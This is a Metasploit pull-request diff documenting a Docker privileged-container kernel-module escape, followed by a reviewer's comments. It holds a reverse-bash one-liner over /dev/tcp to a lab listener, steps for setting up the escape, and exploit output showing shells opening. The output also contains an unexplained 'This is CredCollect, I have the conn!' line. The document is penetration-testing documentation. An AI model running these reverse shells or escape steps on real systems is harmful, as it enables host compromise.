Land #18519, Docker kernel module escape
Showing 4 changed files with 749 additions and 429 deletions.
110 changes: 110 additions & 0 deletions
...tation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md
@@ -0,0 +1,110 @@ | ||
## Vulnerable Application | ||
|
||
This module performs a container escape onto the host as the daemon user. It | ||
takes advantage of the SYS_MODULE capability. If that exists and the linux | ||
headers are available to compile on the target, then we can escape onto the host. | ||
|
||
### Creating A Testing Environment | ||
|
||
- Get a VM that you want to test on (or your own machine) | ||
- Install Docker | ||
- Run a listener (can be anything but this example will make use of the msfconsole `cmd/unix/reverse_bash` payload) | ||
```msf | ||
msf6 > use payload/cmd/unix/reverse_bash | ||
msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0 | ||
lhost => 192.168.56.1 | ||
msf6 payload(cmd/unix/reverse_bash) > generate -f raw | ||
bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' | ||
msf6 payload(cmd/unix/reverse_bash) > exploit -z | ||
[*] Payload Handler Started as Job 0 | ||
msf6 payload(cmd/unix/reverse_bash) > | ||
[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444 | ||
``` | ||
- Create a privileged container (forwarding port 4444 in this example in order | ||
to use a bind shell from the host. Container must be the same OS as host) | ||
```bash | ||
docker run --rm -it --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' | ||
``` | ||
- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example | ||
```bash | ||
apt update && apt install -y gcc make kmod linux-headers-$(uname -r) | ||
``` | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
2. Get a session | ||
3. Install required packages into session (line 30) | ||
4. Run `use exploit/linux/local/docker_privileged_container_kernel_escape` | ||
5. Run `set SESSION [session]` | ||
6. Run `check` | ||
7. Run `set PAYLOAD [payload]` | ||
8. Run `exploit` | ||
|
||
## Options | ||
|
||
### KernelModuleName | ||
|
||
The name that the kernel module will be called in the system. The default if no | ||
name is set is "{rand(8)}" | ||
|
||
### WritableContainerDir | ||
|
||
A directory where we can write files inside the container (default is `/tmp/.{rand(4)}`). | ||
This is needed to drop the payload into the container. | ||
|
||
### ReloadKernelModule | ||
|
||
Rebuilds and reloads kernel module if its already loaded in case of repeat runs. | ||
|
||
## Scenarios | ||
|
||
### Container Escape from debian linux with reverse bash | ||
|
||
```msf | ||
msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)" | ||
[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126) | ||
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape | ||
[*] Using configured payload cmd/unix/reverse_bash | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1 | ||
session => 1 | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check | ||
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z | ||
[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 | ||
[*] [2023.11.07-21:42:42] Creating files... | ||
[*] [2023.11.07-21:42:43] Compiling the kernel module... | ||
[+] [2023.11.07-21:42:43] Kernel module compiled successfully | ||
[*] [2023.11.07-21:42:43] Loading kernel module... | ||
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500 | ||
[*] This is CredCollect, I have the conn! | ||
``` | ||
|
||
### Container Escape from arch linux with meterpreter | ||
|
||
```msf | ||
msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers" | ||
[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106) | ||
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape | ||
[*] Using configured payload cmd/unix/reverse_bash | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2 | ||
session => 2 | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp | ||
payload => cmd/linux/http/x64/meterpreter/reverse_tcp | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0 | ||
lhost => vboxnet0 | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check | ||
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z | ||
[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 | ||
[*] [2023.11.07-21:48:41] Creating files... | ||
[*] [2023.11.07-21:48:43] Compiling the kernel module... | ||
[+] [2023.11.07-21:48:44] Kernel module compiled successfully | ||
[*] [2023.11.07-21:48:44] Loading kernel module... | ||
[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106 | ||
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500 | ||
[*] This is CredCollect, I have the conn! | ||
[*] Session 4 created in the background. | ||
``` |
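Review bot: the container-creation bullet is inconsistent with the command it introduces: the text says "forwarding port 4444 in this example in order to use a bind shell from the host", but the `docker run` line publishes no port (no `-p`) and the command it runs is the `cmd/unix/reverse_bash` reverse shell generated in the previous bullet, so either drop the port-forward/bind-shell remark or change the command to match. Two smaller points in the same hunk: verification step 3 says "Install required packages into session (line 30)", a line-number reference that already does not match the rendered file and will drift on every edit, so point at the "Creating A Testing Environment" section instead; and "Container must be the same OS as host" understates the real constraint, which is that the headers installed in the container (`linux-headers-$(uname -r)` in the Debian example) must match the host's running kernel, because `uname -r` inside the container reports the host kernel and the module is built against it. Finally, in the ReloadKernelModule description "if its already loaded" should read "if it's already loaded".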